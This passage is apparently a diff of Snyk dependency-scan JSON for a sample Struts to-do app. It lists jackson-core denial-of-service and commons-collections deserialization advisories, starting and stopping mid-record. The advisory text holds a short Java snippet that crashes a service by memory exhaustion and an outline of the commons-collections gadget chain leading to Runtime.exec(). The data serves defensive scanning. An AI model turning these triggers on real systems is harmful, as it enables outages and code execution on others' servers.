For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-399" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-core", - "proprietary": false, - "creationTime": "2017-09-20T15:28:35.195000Z", - "functions_new": [ - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", - "functionName": "_reportInvalidToken" - } - }, - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", - "functionName": "_reportInvalidToken" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-01-12T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-core" - }, - "publicationTime": "2017-09-20T15:28:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:58:01.546686Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", - "title": "Denial of Service (DoS)", - "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "gmethwin@github" - ], - "semver": { - "vulnerable": [ - "[2.3.0-rc1,2.7.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", - "className": "UTF8JsonGenerator", - "functionName": "writeNumber" - } - }, - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", - "className": "WriterBasedJsonGenerator", - "functionName": "writeNumber" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-core", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-core/issues/315", - "title": "GitHub Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:48.004490Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). 
When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-399" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-core", - "proprietary": false, - "creationTime": "2017-09-20T15:28:35.195000Z", - "functions_new": [ - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", - "functionName": "writeNumber" - } - }, - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", - "functionName": "writeNumber" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2016-08-25T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-core" - }, - "publicationTime": "2017-09-20T15:28:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:55:48.004490Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", - "title": "Deserialization of Untrusted 
Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "transform" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.078866Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
- "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", - "epssDetails": { - "percentile": "0.88407", - "probability": "0.01844", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-7501" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "transform" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:38.421377Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,3.2.2)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.6, - "functions": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/commons-collections/pull/18", - "title": "GitHub PR" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:34.698666Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": 
"NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## 
Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. 
Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. 
The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", - "epssDetails": { - "percentile": "0.82603", - "probability": "0.00880", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-6420" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6hgm-866r-3cjv" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2019-10-10T18:31:03.943542Z", - "functions_new": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-10T00:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2020-02-24T00:00:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:35.761152Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": 
"commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - }, - { - "url": "https://www.exploit-db.com/exploits/46628", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.088365Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": 
"critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99663", - "probability": "0.96725", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-4852" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.946764Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.834525Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30082", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "TERASOLUNA Framework Development Team" - ], - "semver": { - "vulnerable": [ - "[1.3,1.3.2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "1.3.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-fileupload:commons-fileupload", - "references": [ - { - "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E", - "title": "Apache Mail Archive" - }, - { - "url": "http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h", - "title": "Apache-SVN" - }, - { - "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092", - "title": "CVE Details" - }, - { - "url": "https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml%23L84", - "title": "Github ChangeLog" - }, - { - "url": "https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f", - "title": "GitHub Commit" - }, - { - "url": 